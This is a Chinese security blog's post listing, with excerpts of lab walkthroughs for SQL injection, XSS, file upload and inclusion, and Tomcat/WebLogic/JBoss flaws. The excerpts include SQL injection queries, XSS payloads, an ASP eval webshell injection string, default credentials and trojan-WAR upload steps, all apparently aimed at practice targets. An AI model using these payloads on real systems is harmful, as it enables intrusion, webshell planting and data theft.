- 博客(40)
- 收藏
- 关注
RSS订阅原创 常见框架漏洞复现
漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。编辑请求头,增加Range: bytes=0-18446744073709551615字段,若返回码状态为416。HTTP.SYS远程代码执⾏(MS15-034) MS-->Microsoft 2015 -034。值,若有,则证明该系统使⽤了Shiro框架。
2024-09-23 19:04:08
3614
原创 Jboss 漏洞复现
2、找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署。4、制作war包 填写war包远程地址。
2024-09-22 16:48:16
939
原创 WebLogic 漏洞复现
weblogic常⽤弱⼝令:https://cirt.net/passwords?3、上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传。2、在当前⻚⾯抓包之后,添加下⾯请求包,反弹shell。2、在当前⻚⾯抓包 , 修改请求包 , 写⼊shell。3、访问下载到weblogic服务器上的⽊⻢,进⾏连接。默认账号密码:weblogic/Oracle@123。这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。2、登录后台后,点击部署,点击安装,点击上传⽂件。2、直接使⽤利⽤工具。
2024-09-22 14:51:09
597
原创 Tomcat 漏洞复现
1、tomcat默认的conf/server.xml中配置了2个Connector,一个为 8080 的对外提供的HTTP协议端口另外一个就是默认的 8009 AJP协议端口,两个端口默认均监听在外网ip。4、文件上传成功后,默认会在网站根目录下生成和war包名称⼀致得目录,然后目录中得木马就是压缩前的文件名,Webshell客户端⼯具进⾏连接。3、制作WAR包,将JSP木马压缩为ZIP格式,然后修改后缀为war。2、首页抓包,修改为 PUT 方式提交。3、访问上传的jsp文件。4、使用工具进行连接。
2024-09-22 13:34:59
615
原创 aspcms webshell漏洞复现
1、在网址后输入/admin_aspcms/login.asp进入后台登陆界面2、输入账号admin 密码123456 进行登录3、点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包4、修改数据包中slideTextStatus的参数1%25><25Eval(Request(chr(65)))25><%255、访问/config/AspCms_Config.asp6、使用菜刀进行连接 密码为a
2024-09-17 13:22:10
301
1
原创 Rickdiculously Easy靶场渗透测试
使用ls发现FLAG.txt,查看FLAG.txt内容,得出第五个flag。通过ls可以发现FLAG.txt文件,查看文件内容,得出第四个flag。点击passwords.html,查看页面源代码,得出ssh连接密码。访问172.16.1.7:13337,得出第二个flag。172.16.1.7:9090,得出第一个flag。点击flag.txt,得出第三个flag。
2024-09-11 16:09:04
373
原创 vulhub Thinkphp5 2-rce远程代码执行漏洞
cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录。up -d #启动靶场。ps #查看容器信息。
2024-09-08 14:50:31
366
原创 vulhub GhostScript 沙箱绕过(CVE-2018-16509)
cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。
2024-09-08 14:33:17
380
原创 中间件解析漏洞
(4)将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏.(2)IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾。(2)访问上传的evil⽂件在后⾯加上 %0a 再访问发现解析了其中的PHP代码,但后缀不是php说明 存在解析漏洞。(1)配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启....(2)访问获取文件地址。
2024-09-05 19:24:37
862
原创 tomato靶机通关攻略
4、访问http://172.16.1.113/antibot_image/2、访问开放的端口,当访问8888是,出现登录界面。5、点击antibots文件夹,可以发现许多文件。查看页面源代码,可以发现参数为image。再点击info.php。连接,写入一句话木马。8、使用蚁剑进行连接。
2024-09-04 15:02:03
467
原创 文件包含PHP伪协议利用方法
使用php://filter协议可以将php代码进行base64编码后显示出来。使用php://input协议可以将post请求的数据作为php代码运行。使用data://协议可以将数据直接嵌入url中。使用file协议读取Windows系统文件。使用zip://协议可以查看压缩包中的文件。使用phar://可以直接读取压缩包的内容。点击forward,发现php代码被执行。修改请求方式为POST。访问该协议并进行抓包。在下方输入php代码。
2024-09-03 19:30:19
580
原创 pikachu文件包含漏洞靶场
5、将我们上传的文件包含进来 使用../返回上级目录 来进行包含木马文件。3、将文件远程包含在filename处修改为云服务器的目标地址。可以得出是GET传参 可以在filename参数进行文件包含。2、打开pikachu的远程文件包含,随便提交查询一个。4、查看fileinclude目录是否生成php文件。4、访问文件保存的路径uploads/2.jpg。1、在云主机上生成一个1.txt文件。5、访问生成的L.php文件。2、准备一个2.jpg文件。3、上传2.jpg文件。6、使用蚁剑进行连接。
2024-09-03 18:50:00
561
原创 hackme靶机通关攻略
输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #
2024-09-03 17:57:46
445
原创 Upload-labs 1-21关 靶场通关攻略
1、上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行。1、上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg。1、图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。1、上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。2、先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片。
2024-09-01 14:20:13
1240
原创 sqli-labs靶场通关攻略(51-60)
sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1) 页面回显正常。sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1),页面延时三秒。3、查询数据库中的表。4、查询数据库中的表。
2024-08-30 11:52:25
828
1
原创 vulhub xxe靶机
16、将flag.php放入phpstudy 的 WWW目录中,开启 phpstudy.最后用浏览器去访问这个文件。15、复制代码,新建一个名为flag.php文档粘贴进去,并加入PHP语句。通过php伪协议base64加密读取 flagmeout.php 文件。7、对得到的 Base64 编码进行解码操作,并得出登陆账号和密码。9、使用解析出来的密码登录IP/xxe/admin.php。登录后点击flag,会找到flagmeout.php。11、对得到的 Base64 编码进行解码操作。
2024-08-29 18:58:19
557
原创 sqli-labs靶场通关攻略(41-50)
输入login_user=1'--+&login_password=1'or updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security'and table_name='users')),1)--+id=-1 union select 1,2,database() --+id=-1 union select 1,2,3 --+
2024-08-28 18:33:23
1020
原创 xss-labs靶场通关详解
2、在数据包中添加Referer='" type='text' onclick='alert(123)'2、在user处写入点击事件'" type='text' onclick='alert(123)'2、将UA头写入点击事件'" type='text' onclick='alert(123)'3、点击forward,页面出现搜索框,点击搜索框,即可出现弹窗。3、点击forward,页面出现搜索框,点击搜索框,即可出现弹窗。3点击forward,页面出现搜索框,点击搜索框,即可出现弹窗。
2024-08-27 18:53:40
397
原创 ctfhub-web-SSRF通关攻略
所以在url后输入file:///var/www/html/flag.php,发现页面没有显示flag。2、在url后输入http://127.0.0.1/flah.php 页面出现文件提交。2、在url后输入http://127.0.0.1/flag.php 页面出现搜索框。3、结合本题要求,在url后输入http://127.0.0.1/flag.php。3、查看页面源代码,将key后边的值输入到搜索框中。6、将编码后的数据中的%0a替换为%0d%0a。6、将编码后的数据中的%0A替换为%0D%0A。
2024-08-27 16:44:11
506
原创 sqli-labs靶场通关攻略(31-40)
1、判断注入点输入?id=1\,页面显示:可以得出注入点为")2、查询回显点输入?id=1&&id=0") union select 1,2,3 --+得出回显点为2,33、查询数据库名输入 ?id=1&&id=0") union select 1,database(),3 --+4、查询数据库中的表?id=1&&id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema
2024-08-26 19:17:00
905
原创 xss-labs靶场通关详解(1-10)
xssalert(1),发现没有出现弹窗。1、在输入框中输入alert(1),发现没有出现弹窗。1、在搜索框中输入alert(1),没有出现弹窗。1、在搜索框输入alert(1)
2024-08-25 15:13:11
596
原创 sqli-labs靶场通关攻略(21-30)
代码:" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' # =>对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode。利用联合查询闭合方式为id=1' --+id=1 --+有数据。
2024-08-22 20:09:59
2139
原创 piakchu靶场XXS通关攻略
alert(1)</script>,发现页面没有出现弹窗。3、输入</script><script>alert(1)
2024-08-22 19:20:52
534
原创 sqli-labs靶场通关攻略(16-20)
说明users表里面的username字段的第一条数据的第一个字母的ascii码为68,对比ASCII表可以得出第一个字母为'D'说明users表的第一个字段的第一位字母ascii码为105 对比ASCII表可以得出第一个字母为 'i'2、输入:1") and updatexml(1,concat(1,database()),1) #通过查询ASCII表可以得出,第一个字母为's',以此类推,即可得出数据库名为'security'1、页面输入admin 123456 登录,使用Burp Suite 抓包。
2024-08-21 19:28:57
1159
原创 PostGREsql⼿⼯注⼊
3、开始检测这4个字段当中哪些字段可以被前端显示出来且使⽤union 查询来构造 Payload/...通过测试发现只有第⼆第三个字段是前端回显数据字段。4、在这两个字段当中来查询我们想要的得到的数据。id=1 and 1=2 页面没有回显,说明存在sql注入。id=1 order by 4 页面显示正常。id=1 order by 5 页面没有回显。5、构造Payload爆指定数据库下的表名。1、查看是否存在注入点。
2024-08-20 19:13:51
399
原创 MongoDB⼿⼯注⼊
2、成功显示“1”和“2”。可以在此来显示想要查询的数据。通过回显观察到数据库为 mozhe_cms_Authority其中tojson是可以把数据变成 json型数据,db为取当前数据库,即当前的数据库为 mozhe_cms_Authority。注意到可以通过闭合 “({‘” 来构造payload 因为返回的数据是$obj[‘retva l’][‘title’]与$obj[‘retval’][‘content’],可以尝试return({title:’1’,conten t:’2’})来构造回显测试。
2024-08-20 18:48:05
232
原创 mssql sqli labs 靶场通关
步骤一:判断注入方式 ?id=1' --+步骤二:判断后台是否是MYSQL数据库?id=1' and exists(select * from sysobjects) --+步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限?id=-1' union select 1,user,is_srvrolemember('public'); --+步骤四:查询表名第一张表:?id=-1'and (select top 1 cast (name as varchar(256))
2024-08-20 18:22:55
1126
原创 Access手工注入靶场(附环境搭建教程)
表名只能靠字节猜测 常见的表名或字段名:admin、users、username、user_name admin_user、administrator。1、百度网盘链接:链接:https://pan.baidu.com/s/1Rl-YsRyD6UsvheTfYmHEkw 提取码:sfln。尝试用户名的字段=user_name时 页面显示正常 返回了用户名为admin。id=10 and 1=1 页面显示正确。id=10 and 1=2 页面报错。id=10' 页面报错。
2024-08-20 15:11:10
536
原创 sqli-labs靶场通关攻略(11-15)
输入语句:1') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #输入语句:1') and updatexml(1,concat(1,(select group_concat(username,password) from users)),1) #
2024-08-19 20:40:11
2129
原创 AI Web 1.0通关攻略
访问http://172.16.1.88/robots.txt,发现/madiNf0/和/se3reTdir777/uploads/两个路径。使用dirb "http://172.16.1.88"进一步扫描,发现有一个robots.txt。访问http://172.16.1.88/se3reTdir777/index.php。使用dirb对/m3diNf0/扫描,发现info.php页面。访问/se3reTdir777/upload/发现也不能。使用dirb对//扫描,发现一个index.php的页面。
2024-08-19 18:06:46
443
原创 sqli-labs靶场通关攻略
id=1' order by 4 --+ 页面不正常 说明存在3列。页面显示的是id=1的数据,没有显示联合查询的数据,把页面前面查询的id的数据改成不存在的,比如-1,即可显示。第七步、使用联合查询,查询网站的security数据库里所有表名。第一步、搭建环境,使用版本为5.4.45的PHP。第八步、使用联合查询,查询users列表所有列。第五步、使用联合查询,可以查找页面回显点。第六步、使用联合查询,查询数据库和用户名。第二步、打开Less-1。
2024-08-14 19:50:44
540
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人